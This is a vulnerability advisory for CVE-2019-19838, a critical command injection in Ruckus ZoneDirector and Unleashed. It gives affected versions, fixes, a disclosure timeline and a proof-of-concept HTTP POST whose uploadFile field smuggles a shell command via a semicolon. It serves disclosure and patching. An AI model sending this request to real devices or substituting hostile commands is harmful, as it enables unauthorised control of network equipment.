Remote command injection via a crafted HTTP request (cmdImportAvpPort)

Aleph Research Advisory

Identifier

CVE-2019-19838

Severity

Critical

Product

- ZoneDirector - Unleashed

Vulnerable Version

- ZoneDirector: 9.9 and before - ZoneDirector: 9.10.x - ZoneDirector: 9.12.x - ZoneDirector: 9.13.x - ZoneDirector: 10.0.x - ZoneDirector: 10.1.x - ZoneDirector: 10.2.x - ZoneDirector: 10.3.x - Unleashed: 200.6 and before - Unleashed: 200.7

Mitigation

- 9.10.x: Upgrade to 9.10.2.0.84 - 9.12.x: Upgrade to 9.12.3.0.136 - 9.13.x: Upgrade to 10.0.1.0.90 - 10.0.x: Upgrade to 10.0.1.0.90 - 10.1.x: Upgrade to 10.1.2.0.275 - 10.2.x: Upgrade to 10.2.1.0.147 - 10.3.x: Upgrade to 10.3.1.0.21 - 200.6 and before: Upgrade to 200.7.10.202.94 - 200.7: Upgrade to 200.7.10.202.94

Technical Details

Remote command injection via a crafted HTTP request, caused by insufficient input validation

cmdImportAvpPort() function in emfd executable runs system() with insufficient input validation on fileUpload attribute. As a result a crafted POST request with attribute xcmd=import-avpport to the web interface page /admin/_cmdstat.jsp injects OS command.

Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.

Proof Of Concept

Jail breaking Ruckus CLI using this exploit

POST /tools/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
X-CSRF-Token: oaMM8EBv1Y
Content-Length: 336
Cookie: -ejs-session-=x236a14bd195e0f136942005c785bac52

<ajax-request action='docmd' xcmd='get-platform-depends' updater='system.1568118269965.3208' comp='system'> 
	<xcmd cmd='import-avpport' uploadFile='; echo "inject" >/tmp/botox'  type='wlan-maxnums'/>
</ajax-request>

Timeline

19-Sep-19
: Reported to Ruckus Product Security Team
24-Dec-19
: Patch
17-Dec-19
: CVE-2019-19838 assigned
31-Dec-19
: Public disclosure

Credit

waveburst of Aleph Research, HCL Software